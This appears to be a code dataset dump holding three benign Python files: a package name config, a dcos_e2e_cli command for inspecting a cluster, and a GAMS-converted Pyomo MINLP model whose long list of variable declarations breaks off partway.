content
stringlengths
5
1.05M
from ..config import PROGRAM

# This sub-package inherits the parent program's name unchanged; a
# previous scheme suffixed it with the module name ("<program>-baf")
# but is no longer used.
APP = PROGRAM
MODULE = "baf"
""" Tools for inspecting existing clusters. """ import click from dcos_e2e_cli.common.inspect_cluster import show_cluster_details from dcos_e2e_cli.common.options import ( existing_cluster_id_option, verbosity_option, ) from dcos_e2e_cli.common.utils import check_cluster_id_exists from ._common import ClusterVMs, existing_cluster_ids @click.command('inspect') @existing_cluster_id_option @verbosity_option def inspect_cluster(cluster_id: str) -> None: """ Show cluster details. """ check_cluster_id_exists( new_cluster_id=cluster_id, existing_cluster_ids=existing_cluster_ids(), ) cluster_vms = ClusterVMs(cluster_id=cluster_id) show_cluster_details( cluster_id=cluster_id, cluster_representation=cluster_vms, )
# MINLP written by GAMS Convert at 01/15/21 11:37:20 # # Equation counts # Total E G L N X C B # 2935 1123 129 1683 0 0 0 0 # # Variable counts # x b i s1s s2s sc si # Total cont binary integer sos1 sos2 scont sint # 1759 1387 372 0 0 0 0 0 # FX 0 0 0 0 0 0 0 0 # # Nonzero counts # Total const NL DLL # 6934 6754 180 0 # # Reformulation has removed 1 variable and 1 equation from pyomo.environ import * model = m = ConcreteModel() m.x2 = Var(within=Reals,bounds=(0,None),initialize=0) m.x3 = Var(within=Reals,bounds=(0,None),initialize=0) m.x4 = Var(within=Reals,bounds=(0,None),initialize=0) m.x5 = Var(within=Reals,bounds=(0,None),initialize=0) m.x6 = Var(within=Reals,bounds=(0,None),initialize=0) m.x7 = Var(within=Reals,bounds=(0,None),initialize=0) m.x8 = Var(within=Reals,bounds=(0,None),initialize=0) m.x9 = Var(within=Reals,bounds=(0,None),initialize=0) m.x10 = Var(within=Reals,bounds=(0,None),initialize=0) m.x11 = Var(within=Reals,bounds=(0,None),initialize=0) m.x12 = Var(within=Reals,bounds=(0,None),initialize=0) m.x13 = Var(within=Reals,bounds=(0,None),initialize=0) m.x14 = Var(within=Reals,bounds=(0,None),initialize=0) m.x15 = Var(within=Reals,bounds=(0,None),initialize=0) m.x16 = Var(within=Reals,bounds=(0,None),initialize=0) m.x17 = Var(within=Reals,bounds=(0,None),initialize=0) m.x18 = Var(within=Reals,bounds=(0,None),initialize=0) m.x19 = Var(within=Reals,bounds=(0,None),initialize=0) m.x20 = Var(within=Reals,bounds=(0,None),initialize=0) m.x21 = Var(within=Reals,bounds=(0,None),initialize=0) m.x22 = Var(within=Reals,bounds=(0,None),initialize=0) m.x23 = Var(within=Reals,bounds=(0,None),initialize=0) m.x24 = Var(within=Reals,bounds=(0,None),initialize=0) m.x25 = Var(within=Reals,bounds=(0,None),initialize=0) m.x26 = Var(within=Reals,bounds=(0,None),initialize=0) m.x27 = Var(within=Reals,bounds=(0,None),initialize=0) m.x28 = Var(within=Reals,bounds=(0,None),initialize=0) m.x29 = Var(within=Reals,bounds=(0,None),initialize=0) m.x30 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x31 = Var(within=Reals,bounds=(0,None),initialize=0) m.x32 = Var(within=Reals,bounds=(0,None),initialize=0) m.x33 = Var(within=Reals,bounds=(0,None),initialize=0) m.x34 = Var(within=Reals,bounds=(0,None),initialize=0) m.x35 = Var(within=Reals,bounds=(0,None),initialize=0) m.x36 = Var(within=Reals,bounds=(0,None),initialize=0) m.x37 = Var(within=Reals,bounds=(0,None),initialize=0) m.x38 = Var(within=Reals,bounds=(0,None),initialize=0) m.x39 = Var(within=Reals,bounds=(0,None),initialize=0) m.x40 = Var(within=Reals,bounds=(0,None),initialize=0) m.x41 = Var(within=Reals,bounds=(0,None),initialize=0) m.x42 = Var(within=Reals,bounds=(0,None),initialize=0) m.x43 = Var(within=Reals,bounds=(0,None),initialize=0) m.x44 = Var(within=Reals,bounds=(0,None),initialize=0) m.x45 = Var(within=Reals,bounds=(0,None),initialize=0) m.x46 = Var(within=Reals,bounds=(0,None),initialize=0) m.x47 = Var(within=Reals,bounds=(0,None),initialize=0) m.x48 = Var(within=Reals,bounds=(0,None),initialize=0) m.x49 = Var(within=Reals,bounds=(0,None),initialize=0) m.x50 = Var(within=Reals,bounds=(0,None),initialize=0) m.x51 = Var(within=Reals,bounds=(0,None),initialize=0) m.x52 = Var(within=Reals,bounds=(0,None),initialize=0) m.x53 = Var(within=Reals,bounds=(0,None),initialize=0) m.x54 = Var(within=Reals,bounds=(0,None),initialize=0) m.x55 = Var(within=Reals,bounds=(0,None),initialize=0) m.x56 = Var(within=Reals,bounds=(0,None),initialize=0) m.x57 = Var(within=Reals,bounds=(0,None),initialize=0) m.x58 = Var(within=Reals,bounds=(0,None),initialize=0) m.x59 = Var(within=Reals,bounds=(0,None),initialize=0) m.x60 = Var(within=Reals,bounds=(0,None),initialize=0) m.x61 = Var(within=Reals,bounds=(0,None),initialize=0) m.x62 = Var(within=Reals,bounds=(0,None),initialize=0) m.x63 = Var(within=Reals,bounds=(0,None),initialize=0) m.x64 = Var(within=Reals,bounds=(0,None),initialize=0) m.x65 = Var(within=Reals,bounds=(0,None),initialize=0) m.x66 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x67 = Var(within=Reals,bounds=(0,None),initialize=0) m.x68 = Var(within=Reals,bounds=(0,None),initialize=0) m.x69 = Var(within=Reals,bounds=(0,None),initialize=0) m.x70 = Var(within=Reals,bounds=(0,None),initialize=0) m.x71 = Var(within=Reals,bounds=(0,None),initialize=0) m.x72 = Var(within=Reals,bounds=(0,None),initialize=0) m.x73 = Var(within=Reals,bounds=(0,None),initialize=0) m.x74 = Var(within=Reals,bounds=(0,None),initialize=0) m.x75 = Var(within=Reals,bounds=(0,None),initialize=0) m.x76 = Var(within=Reals,bounds=(0,None),initialize=0) m.x77 = Var(within=Reals,bounds=(0,None),initialize=0) m.x78 = Var(within=Reals,bounds=(0,None),initialize=0) m.x79 = Var(within=Reals,bounds=(0,None),initialize=0) m.x80 = Var(within=Reals,bounds=(0,None),initialize=0) m.x81 = Var(within=Reals,bounds=(0,None),initialize=0) m.x82 = Var(within=Reals,bounds=(0,None),initialize=0) m.x83 = Var(within=Reals,bounds=(0,None),initialize=0) m.x84 = Var(within=Reals,bounds=(0,None),initialize=0) m.x85 = Var(within=Reals,bounds=(0,None),initialize=0) m.x86 = Var(within=Reals,bounds=(0,None),initialize=0) m.x87 = Var(within=Reals,bounds=(0,None),initialize=0) m.x88 = Var(within=Reals,bounds=(0,None),initialize=0) m.x89 = Var(within=Reals,bounds=(0,None),initialize=0) m.x90 = Var(within=Reals,bounds=(0,None),initialize=0) m.x91 = Var(within=Reals,bounds=(0,None),initialize=0) m.x92 = Var(within=Reals,bounds=(0,None),initialize=0) m.x93 = Var(within=Reals,bounds=(0,None),initialize=0) m.x94 = Var(within=Reals,bounds=(0,None),initialize=0) m.x95 = Var(within=Reals,bounds=(0,None),initialize=0) m.x96 = Var(within=Reals,bounds=(0,None),initialize=0) m.x97 = Var(within=Reals,bounds=(0,None),initialize=0) m.x98 = Var(within=Reals,bounds=(0,None),initialize=0) m.x99 = Var(within=Reals,bounds=(0,None),initialize=0) m.x100 = Var(within=Reals,bounds=(0,None),initialize=0) m.x101 = Var(within=Reals,bounds=(0,None),initialize=0) m.x102 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x103 = Var(within=Reals,bounds=(0,None),initialize=0) m.x104 = Var(within=Reals,bounds=(0,None),initialize=0) m.x105 = Var(within=Reals,bounds=(0,None),initialize=0) m.x106 = Var(within=Reals,bounds=(0,None),initialize=0) m.x107 = Var(within=Reals,bounds=(0,None),initialize=0) m.x108 = Var(within=Reals,bounds=(0,None),initialize=0) m.x109 = Var(within=Reals,bounds=(0,None),initialize=0) m.x110 = Var(within=Reals,bounds=(0,None),initialize=0) m.x111 = Var(within=Reals,bounds=(0,None),initialize=0) m.x112 = Var(within=Reals,bounds=(0,None),initialize=0) m.x113 = Var(within=Reals,bounds=(0,None),initialize=0) m.x114 = Var(within=Reals,bounds=(0,None),initialize=0) m.x115 = Var(within=Reals,bounds=(0,None),initialize=0) m.x116 = Var(within=Reals,bounds=(0,None),initialize=0) m.x117 = Var(within=Reals,bounds=(0,None),initialize=0) m.x118 = Var(within=Reals,bounds=(0,None),initialize=0) m.x119 = Var(within=Reals,bounds=(0,None),initialize=0) m.x120 = Var(within=Reals,bounds=(0,None),initialize=0) m.x121 = Var(within=Reals,bounds=(0,None),initialize=0) m.x122 = Var(within=Reals,bounds=(0,None),initialize=0) m.x123 = Var(within=Reals,bounds=(0,None),initialize=0) m.x124 = Var(within=Reals,bounds=(0,None),initialize=0) m.x125 = Var(within=Reals,bounds=(0,None),initialize=0) m.x126 = Var(within=Reals,bounds=(0,None),initialize=0) m.x127 = Var(within=Reals,bounds=(0,None),initialize=0) m.x128 = Var(within=Reals,bounds=(0,None),initialize=0) m.x129 = Var(within=Reals,bounds=(0,None),initialize=0) m.x130 = Var(within=Reals,bounds=(0,None),initialize=0) m.x131 = Var(within=Reals,bounds=(0,None),initialize=0) m.x132 = Var(within=Reals,bounds=(0,None),initialize=0) m.x133 = Var(within=Reals,bounds=(0,None),initialize=0) m.x134 = Var(within=Reals,bounds=(0,None),initialize=0) m.x135 = Var(within=Reals,bounds=(0,None),initialize=0) m.x136 = Var(within=Reals,bounds=(0,None),initialize=0) m.x137 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x138 = Var(within=Reals,bounds=(0,None),initialize=0) m.x139 = Var(within=Reals,bounds=(0,None),initialize=0) m.x140 = Var(within=Reals,bounds=(0,None),initialize=0) m.x141 = Var(within=Reals,bounds=(0,None),initialize=0) m.x142 = Var(within=Reals,bounds=(0,None),initialize=0) m.x143 = Var(within=Reals,bounds=(0,None),initialize=0) m.x144 = Var(within=Reals,bounds=(0,None),initialize=0) m.x145 = Var(within=Reals,bounds=(0,None),initialize=0) m.x146 = Var(within=Reals,bounds=(0,None),initialize=0) m.x147 = Var(within=Reals,bounds=(0,None),initialize=0) m.x148 = Var(within=Reals,bounds=(0,None),initialize=0) m.x149 = Var(within=Reals,bounds=(0,None),initialize=0) m.x150 = Var(within=Reals,bounds=(0,None),initialize=0) m.x151 = Var(within=Reals,bounds=(0,None),initialize=0) m.x152 = Var(within=Reals,bounds=(0,None),initialize=0) m.x153 = Var(within=Reals,bounds=(0,None),initialize=0) m.x154 = Var(within=Reals,bounds=(0,None),initialize=0) m.x155 = Var(within=Reals,bounds=(0,None),initialize=0) m.x156 = Var(within=Reals,bounds=(0,None),initialize=0) m.x157 = Var(within=Reals,bounds=(0,None),initialize=0) m.x158 = Var(within=Reals,bounds=(0,None),initialize=0) m.x159 = Var(within=Reals,bounds=(0,None),initialize=0) m.x160 = Var(within=Reals,bounds=(0,None),initialize=0) m.x161 = Var(within=Reals,bounds=(0,None),initialize=0) m.x162 = Var(within=Reals,bounds=(0,None),initialize=0) m.x163 = Var(within=Reals,bounds=(0,None),initialize=0) m.x164 = Var(within=Reals,bounds=(0,None),initialize=0) m.x165 = Var(within=Reals,bounds=(0,None),initialize=0) m.x166 = Var(within=Reals,bounds=(0,None),initialize=0) m.x167 = Var(within=Reals,bounds=(0,None),initialize=0) m.x168 = Var(within=Reals,bounds=(0,None),initialize=0) m.x169 = Var(within=Reals,bounds=(0,None),initialize=0) m.x170 = Var(within=Reals,bounds=(0,None),initialize=0) m.x171 = Var(within=Reals,bounds=(0,None),initialize=0) m.x172 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x173 = Var(within=Reals,bounds=(0,None),initialize=0) m.x174 = Var(within=Reals,bounds=(0,None),initialize=0) m.x175 = Var(within=Reals,bounds=(0,None),initialize=0) m.x176 = Var(within=Reals,bounds=(0,None),initialize=0) m.x177 = Var(within=Reals,bounds=(0,None),initialize=0) m.x178 = Var(within=Reals,bounds=(0,None),initialize=0) m.x179 = Var(within=Reals,bounds=(0,None),initialize=0) m.x180 = Var(within=Reals,bounds=(0,None),initialize=0) m.x181 = Var(within=Reals,bounds=(0,None),initialize=0) m.x182 = Var(within=Reals,bounds=(0,None),initialize=0) m.x183 = Var(within=Reals,bounds=(0,None),initialize=0) m.x184 = Var(within=Reals,bounds=(0,None),initialize=0) m.x185 = Var(within=Reals,bounds=(0,None),initialize=0) m.x186 = Var(within=Reals,bounds=(0,None),initialize=0) m.x187 = Var(within=Reals,bounds=(0,None),initialize=0) m.x188 = Var(within=Reals,bounds=(0,None),initialize=0) m.x189 = Var(within=Reals,bounds=(0,None),initialize=0) m.x190 = Var(within=Reals,bounds=(0,None),initialize=0) m.x191 = Var(within=Reals,bounds=(0,None),initialize=0) m.x192 = Var(within=Reals,bounds=(0,None),initialize=0) m.x193 = Var(within=Reals,bounds=(0,None),initialize=0) m.x194 = Var(within=Reals,bounds=(0,None),initialize=0) m.x195 = Var(within=Reals,bounds=(0,None),initialize=0) m.x196 = Var(within=Reals,bounds=(0,None),initialize=0) m.x197 = Var(within=Reals,bounds=(0,None),initialize=0) m.x198 = Var(within=Reals,bounds=(0,None),initialize=0) m.x199 = Var(within=Reals,bounds=(0,None),initialize=0) m.x200 = Var(within=Reals,bounds=(0,None),initialize=0) m.x201 = Var(within=Reals,bounds=(0,None),initialize=0) m.x202 = Var(within=Reals,bounds=(0,None),initialize=0) m.x203 = Var(within=Reals,bounds=(0,None),initialize=0) m.x204 = Var(within=Reals,bounds=(0,None),initialize=0) m.x205 = Var(within=Reals,bounds=(0,None),initialize=0) m.x206 = Var(within=Reals,bounds=(0,None),initialize=0) m.x207 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x208 = Var(within=Reals,bounds=(0,None),initialize=0) m.x209 = Var(within=Reals,bounds=(0,None),initialize=0) m.x210 = Var(within=Reals,bounds=(0,None),initialize=0) m.x211 = Var(within=Reals,bounds=(0,None),initialize=0) m.x212 = Var(within=Reals,bounds=(0,None),initialize=0) m.x213 = Var(within=Reals,bounds=(0,None),initialize=0) m.x214 = Var(within=Reals,bounds=(0,None),initialize=0) m.x215 = Var(within=Reals,bounds=(0,None),initialize=0) m.x216 = Var(within=Reals,bounds=(0,None),initialize=0) m.x217 = Var(within=Reals,bounds=(0,None),initialize=0) m.x218 = Var(within=Reals,bounds=(0,None),initialize=0) m.x219 = Var(within=Reals,bounds=(0,None),initialize=0) m.x220 = Var(within=Reals,bounds=(0,None),initialize=0) m.x221 = Var(within=Reals,bounds=(0,None),initialize=0) m.x222 = Var(within=Reals,bounds=(0,None),initialize=0) m.x223 = Var(within=Reals,bounds=(0,None),initialize=0) m.x224 = Var(within=Reals,bounds=(0,None),initialize=0) m.x225 = Var(within=Reals,bounds=(0,None),initialize=0) m.x226 = Var(within=Reals,bounds=(0,None),initialize=0) m.x227 = Var(within=Reals,bounds=(0,None),initialize=0) m.x228 = Var(within=Reals,bounds=(0,None),initialize=0) m.x229 = Var(within=Reals,bounds=(0,None),initialize=0) m.x230 = Var(within=Reals,bounds=(0,None),initialize=0) m.x231 = Var(within=Reals,bounds=(0,None),initialize=0) m.x232 = Var(within=Reals,bounds=(0,None),initialize=0) m.x233 = Var(within=Reals,bounds=(0,None),initialize=0) m.x234 = Var(within=Reals,bounds=(0,None),initialize=0) m.x235 = Var(within=Reals,bounds=(0,None),initialize=0) m.x236 = Var(within=Reals,bounds=(0,None),initialize=0) m.x237 = Var(within=Reals,bounds=(0,None),initialize=0) m.x238 = Var(within=Reals,bounds=(0,None),initialize=0) m.x239 = Var(within=Reals,bounds=(0,None),initialize=0) m.x240 = Var(within=Reals,bounds=(0,None),initialize=0) m.x241 = Var(within=Reals,bounds=(0,None),initialize=0) m.x242 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x243 = Var(within=Reals,bounds=(0,None),initialize=0) m.x244 = Var(within=Reals,bounds=(0,None),initialize=0) m.x245 = Var(within=Reals,bounds=(0,None),initialize=0) m.x246 = Var(within=Reals,bounds=(0,None),initialize=0) m.x247 = Var(within=Reals,bounds=(0,None),initialize=0) m.x248 = Var(within=Reals,bounds=(0,None),initialize=0) m.x249 = Var(within=Reals,bounds=(0,None),initialize=0) m.x250 = Var(within=Reals,bounds=(0,None),initialize=0) m.x251 = Var(within=Reals,bounds=(0,None),initialize=0) m.x252 = Var(within=Reals,bounds=(0,None),initialize=0) m.x253 = Var(within=Reals,bounds=(0,None),initialize=0) m.x254 = Var(within=Reals,bounds=(0,None),initialize=0) m.x255 = Var(within=Reals,bounds=(0,None),initialize=0) m.x256 = Var(within=Reals,bounds=(0,None),initialize=0) m.x257 = Var(within=Reals,bounds=(0,None),initialize=0) m.x258 = Var(within=Reals,bounds=(0,None),initialize=0) m.x259 = Var(within=Reals,bounds=(0,None),initialize=0) m.x260 = Var(within=Reals,bounds=(0,None),initialize=0) m.x261 = Var(within=Reals,bounds=(0,None),initialize=0) m.x262 = Var(within=Reals,bounds=(0,None),initialize=0) m.x263 = Var(within=Reals,bounds=(0,None),initialize=0) m.x264 = Var(within=Reals,bounds=(0,None),initialize=0) m.x265 = Var(within=Reals,bounds=(0,None),initialize=0) m.x266 = Var(within=Reals,bounds=(0,None),initialize=0) m.x267 = Var(within=Reals,bounds=(0,None),initialize=0) m.x268 = Var(within=Reals,bounds=(0,None),initialize=0) m.x269 = Var(within=Reals,bounds=(0,None),initialize=0) m.x270 = Var(within=Reals,bounds=(0,None),initialize=0) m.x271 = Var(within=Reals,bounds=(0,None),initialize=0) m.x272 = Var(within=Reals,bounds=(0,None),initialize=0) m.x273 = Var(within=Reals,bounds=(0,None),initialize=0) m.x274 = Var(within=Reals,bounds=(0,None),initialize=0) m.x275 = Var(within=Reals,bounds=(0,None),initialize=0) m.x276 = Var(within=Reals,bounds=(0,None),initialize=0) m.x277 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x278 = Var(within=Reals,bounds=(0,None),initialize=0) m.x279 = Var(within=Reals,bounds=(0,None),initialize=0) m.x280 = Var(within=Reals,bounds=(0,None),initialize=0) m.x281 = Var(within=Reals,bounds=(0,None),initialize=0) m.x282 = Var(within=Reals,bounds=(0,None),initialize=0) m.x283 = Var(within=Reals,bounds=(0,None),initialize=0) m.x284 = Var(within=Reals,bounds=(0,None),initialize=0) m.x285 = Var(within=Reals,bounds=(0,None),initialize=0) m.x286 = Var(within=Reals,bounds=(0,None),initialize=0) m.x287 = Var(within=Reals,bounds=(0,None),initialize=0) m.x288 = Var(within=Reals,bounds=(0,None),initialize=0) m.x289 = Var(within=Reals,bounds=(0,None),initialize=0) m.x290 = Var(within=Reals,bounds=(0,None),initialize=0) m.x291 = Var(within=Reals,bounds=(0,None),initialize=0) m.x292 = Var(within=Reals,bounds=(0,None),initialize=0) m.x293 = Var(within=Reals,bounds=(0,None),initialize=0) m.x294 = Var(within=Reals,bounds=(0,None),initialize=0) m.x295 = Var(within=Reals,bounds=(0,None),initialize=0) m.x296 = Var(within=Reals,bounds=(0,None),initialize=0) m.x297 = Var(within=Reals,bounds=(0,None),initialize=0) m.x298 = Var(within=Reals,bounds=(0,None),initialize=0) m.x299 = Var(within=Reals,bounds=(0,None),initialize=0) m.x300 = Var(within=Reals,bounds=(0,None),initialize=0) m.x301 = Var(within=Reals,bounds=(0,None),initialize=0) m.x302 = Var(within=Reals,bounds=(0,None),initialize=0) m.x303 = Var(within=Reals,bounds=(0,None),initialize=0) m.x304 = Var(within=Reals,bounds=(0,None),initialize=0) m.x305 = Var(within=Reals,bounds=(0,None),initialize=0) m.x306 = Var(within=Reals,bounds=(0,None),initialize=0) m.x307 = Var(within=Reals,bounds=(0,None),initialize=0) m.x308 = Var(within=Reals,bounds=(0,None),initialize=0) m.x309 = Var(within=Reals,bounds=(0,None),initialize=0) m.x310 = Var(within=Reals,bounds=(0,None),initialize=0) m.x311 = Var(within=Reals,bounds=(0,None),initialize=0) m.x312 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x313 = Var(within=Reals,bounds=(0,None),initialize=0) m.x314 = Var(within=Reals,bounds=(0,None),initialize=0) m.x315 = Var(within=Reals,bounds=(0,None),initialize=0) m.x316 = Var(within=Reals,bounds=(0,None),initialize=0) m.x317 = Var(within=Reals,bounds=(0,None),initialize=0) m.x318 = Var(within=Reals,bounds=(0,None),initialize=0) m.x319 = Var(within=Reals,bounds=(0,None),initialize=0) m.x320 = Var(within=Reals,bounds=(0,None),initialize=0) m.x321 = Var(within=Reals,bounds=(0,None),initialize=0) m.x322 = Var(within=Reals,bounds=(0,None),initialize=0) m.x323 = Var(within=Reals,bounds=(0,None),initialize=0) m.x324 = Var(within=Reals,bounds=(0,None),initialize=0) m.x325 = Var(within=Reals,bounds=(0,None),initialize=0) m.x326 = Var(within=Reals,bounds=(0,None),initialize=0) m.x327 = Var(within=Reals,bounds=(0,None),initialize=0) m.x328 = Var(within=Reals,bounds=(0,None),initialize=0) m.x329 = Var(within=Reals,bounds=(0,None),initialize=0) m.x330 = Var(within=Reals,bounds=(0,None),initialize=0) m.x331 = Var(within=Reals,bounds=(0,None),initialize=0) m.x332 = Var(within=Reals,bounds=(0,None),initialize=0) m.x333 = Var(within=Reals,bounds=(0,None),initialize=0) m.x334 = Var(within=Reals,bounds=(0,None),initialize=0) m.x335 = Var(within=Reals,bounds=(0,None),initialize=0) m.x336 = Var(within=Reals,bounds=(0,None),initialize=0) m.x337 = Var(within=Reals,bounds=(0,None),initialize=0) m.x338 = Var(within=Reals,bounds=(0,None),initialize=0) m.x339 = Var(within=Reals,bounds=(0,None),initialize=0) m.x340 = Var(within=Reals,bounds=(0,None),initialize=0) m.x341 = Var(within=Reals,bounds=(0,None),initialize=0) m.x342 = Var(within=Reals,bounds=(0,None),initialize=0) m.x343 = Var(within=Reals,bounds=(0,None),initialize=0) m.x344 = Var(within=Reals,bounds=(0,None),initialize=0) m.x345 = Var(within=Reals,bounds=(0,None),initialize=0) m.x346 = Var(within=Reals,bounds=(0,None),initialize=0) m.x347 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x348 = Var(within=Reals,bounds=(0,None),initialize=0) m.x349 = Var(within=Reals,bounds=(0,None),initialize=0) m.x350 = Var(within=Reals,bounds=(0,None),initialize=0) m.x351 = Var(within=Reals,bounds=(0,None),initialize=0) m.x352 = Var(within=Reals,bounds=(0,None),initialize=0) m.x353 = Var(within=Reals,bounds=(0,None),initialize=0) m.x354 = Var(within=Reals,bounds=(0,None),initialize=0) m.x355 = Var(within=Reals,bounds=(0,None),initialize=0) m.x356 = Var(within=Reals,bounds=(0,None),initialize=0) m.x357 = Var(within=Reals,bounds=(0,None),initialize=0) m.x358 = Var(within=Reals,bounds=(0,None),initialize=0) m.x359 = Var(within=Reals,bounds=(0,None),initialize=0) m.x360 = Var(within=Reals,bounds=(0,None),initialize=0) m.x361 = Var(within=Reals,bounds=(0,None),initialize=0) m.x362 = Var(within=Reals,bounds=(0,None),initialize=0) m.x363 = Var(within=Reals,bounds=(0,None),initialize=0) m.x364 = Var(within=Reals,bounds=(0,None),initialize=0) m.x365 = Var(within=Reals,bounds=(0,None),initialize=0) m.x366 = Var(within=Reals,bounds=(0,None),initialize=0) m.x367 = Var(within=Reals,bounds=(0,None),initialize=0) m.x368 = Var(within=Reals,bounds=(0,None),initialize=0) m.x369 = Var(within=Reals,bounds=(0,None),initialize=0) m.x370 = Var(within=Reals,bounds=(0,None),initialize=0) m.x371 = Var(within=Reals,bounds=(0,None),initialize=0) m.x372 = Var(within=Reals,bounds=(0,None),initialize=0) m.x373 = Var(within=Reals,bounds=(0,None),initialize=0) m.x374 = Var(within=Reals,bounds=(0,None),initialize=0) m.x375 = Var(within=Reals,bounds=(0,None),initialize=0) m.x376 = Var(within=Reals,bounds=(0,None),initialize=0) m.x377 = Var(within=Reals,bounds=(0,None),initialize=0) m.x378 = Var(within=Reals,bounds=(0,None),initialize=0) m.x379 = Var(within=Reals,bounds=(0,None),initialize=0) m.x380 = Var(within=Reals,bounds=(0,None),initialize=0) m.x381 = Var(within=Reals,bounds=(0,None),initialize=0) m.x382 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x383 = Var(within=Reals,bounds=(0,None),initialize=0) m.x384 = Var(within=Reals,bounds=(0,None),initialize=0) m.x385 = Var(within=Reals,bounds=(0,None),initialize=0) m.x386 = Var(within=Reals,bounds=(0,None),initialize=0) m.x387 = Var(within=Reals,bounds=(0,None),initialize=0) m.x388 = Var(within=Reals,bounds=(0,None),initialize=0) m.x389 = Var(within=Reals,bounds=(0,None),initialize=0) m.x390 = Var(within=Reals,bounds=(0,None),initialize=0) m.x391 = Var(within=Reals,bounds=(0,None),initialize=0) m.x392 = Var(within=Reals,bounds=(0,None),initialize=0) m.x393 = Var(within=Reals,bounds=(0,None),initialize=0) m.x394 = Var(within=Reals,bounds=(0,None),initialize=0) m.x395 = Var(within=Reals,bounds=(0,None),initialize=0) m.x396 = Var(within=Reals,bounds=(0,None),initialize=0) m.x397 = Var(within=Reals,bounds=(0,None),initialize=0) m.x398 = Var(within=Reals,bounds=(0,None),initialize=0) m.x399 = Var(within=Reals,bounds=(0,None),initialize=0) m.x400 = Var(within=Reals,bounds=(0,None),initialize=0) m.x401 = Var(within=Reals,bounds=(0,None),initialize=0) m.x402 = Var(within=Reals,bounds=(0,None),initialize=0) m.x403 = Var(within=Reals,bounds=(0,None),initialize=0) m.x404 = Var(within=Reals,bounds=(0,None),initialize=0) m.x405 = Var(within=Reals,bounds=(0,None),initialize=0) m.x406 = Var(within=Reals,bounds=(0,None),initialize=0) m.x407 = Var(within=Reals,bounds=(0,None),initialize=0) m.x408 = Var(within=Reals,bounds=(0,None),initialize=0) m.x409 = Var(within=Reals,bounds=(0,None),initialize=0) m.x410 = Var(within=Reals,bounds=(0,None),initialize=0) m.x411 = Var(within=Reals,bounds=(0,None),initialize=0) m.x412 = Var(within=Reals,bounds=(0,None),initialize=0) m.x413 = Var(within=Reals,bounds=(0,None),initialize=0) m.x414 = Var(within=Reals,bounds=(0,None),initialize=0) m.x415 = Var(within=Reals,bounds=(0,None),initialize=0) m.x416 = Var(within=Reals,bounds=(0,None),initialize=0) m.x417 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x418 = Var(within=Reals,bounds=(0,None),initialize=0) m.x419 = Var(within=Reals,bounds=(0,None),initialize=0) m.x420 = Var(within=Reals,bounds=(0,None),initialize=0) m.x421 = Var(within=Reals,bounds=(0,None),initialize=0) m.x422 = Var(within=Reals,bounds=(0,None),initialize=0) m.x423 = Var(within=Reals,bounds=(0,None),initialize=0) m.x424 = Var(within=Reals,bounds=(0,None),initialize=0) m.x425 = Var(within=Reals,bounds=(0,None),initialize=0) m.x426 = Var(within=Reals,bounds=(0,None),initialize=0) m.x427 = Var(within=Reals,bounds=(0,None),initialize=0) m.x428 = Var(within=Reals,bounds=(0,None),initialize=0) m.x429 = Var(within=Reals,bounds=(0,None),initialize=0) m.x430 = Var(within=Reals,bounds=(0,None),initialize=0) m.x431 = Var(within=Reals,bounds=(0,None),initialize=0) m.x432 = Var(within=Reals,bounds=(0,None),initialize=0) m.x433 = Var(within=Reals,bounds=(0,None),initialize=0) m.x434 = Var(within=Reals,bounds=(0,None),initialize=0) m.x435 = Var(within=Reals,bounds=(0,None),initialize=0) m.x436 = Var(within=Reals,bounds=(0,None),initialize=0) m.x437 = Var(within=Reals,bounds=(0,None),initialize=0) m.x438 = Var(within=Reals,bounds=(0,None),initialize=0) m.x439 = Var(within=Reals,bounds=(0,None),initialize=0) m.x440 = Var(within=Reals,bounds=(0,None),initialize=0) m.x441 = Var(within=Reals,bounds=(0,None),initialize=0) m.x442 = Var(within=Reals,bounds=(0,None),initialize=0) m.x443 = Var(within=Reals,bounds=(0,None),initialize=0) m.x444 = Var(within=Reals,bounds=(0,None),initialize=0) m.x445 = Var(within=Reals,bounds=(0,None),initialize=0) m.x446 = Var(within=Reals,bounds=(0,None),initialize=0) m.x447 = Var(within=Reals,bounds=(0,None),initialize=0) m.x448 = Var(within=Reals,bounds=(0,None),initialize=0) m.x449 = Var(within=Reals,bounds=(0,None),initialize=0) m.x450 = Var(within=Reals,bounds=(0,None),initialize=0) m.x451 = Var(within=Reals,bounds=(0,None),initialize=0) m.x452 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x453 = Var(within=Reals,bounds=(0,None),initialize=0) m.x454 = Var(within=Reals,bounds=(0,None),initialize=0) m.x455 = Var(within=Reals,bounds=(0,None),initialize=0) m.x456 = Var(within=Reals,bounds=(0,None),initialize=0) m.x457 = Var(within=Reals,bounds=(0,None),initialize=0) m.x458 = Var(within=Reals,bounds=(0,None),initialize=0) m.x459 = Var(within=Reals,bounds=(0,None),initialize=0) m.x460 = Var(within=Reals,bounds=(0,None),initialize=0) m.x461 = Var(within=Reals,bounds=(0,None),initialize=0) m.x462 = Var(within=Reals,bounds=(0,None),initialize=0) m.x463 = Var(within=Reals,bounds=(0,None),initialize=0) m.x464 = Var(within=Reals,bounds=(0,None),initialize=0) m.x465 = Var(within=Reals,bounds=(0,None),initialize=0) m.x466 = Var(within=Reals,bounds=(0,None),initialize=0) m.x467 = Var(within=Reals,bounds=(0,None),initialize=0) m.x468 = Var(within=Reals,bounds=(0,None),initialize=0) m.x469 = Var(within=Reals,bounds=(0,None),initialize=0) m.x470 = Var(within=Reals,bounds=(0,None),initialize=0) m.x471 = Var(within=Reals,bounds=(0,None),initialize=0) m.x472 = Var(within=Reals,bounds=(0,None),initialize=0) m.x473 = Var(within=Reals,bounds=(0,None),initialize=0) m.x474 = Var(within=Reals,bounds=(0,None),initialize=0) m.x475 = Var(within=Reals,bounds=(0,None),initialize=0) m.x476 = Var(within=Reals,bounds=(0,None),initialize=0) m.x477 = Var(within=Reals,bounds=(0,None),initialize=0) m.x478 = Var(within=Reals,bounds=(0,None),initialize=0) m.x479 = Var(within=Reals,bounds=(0,None),initialize=0) m.x480 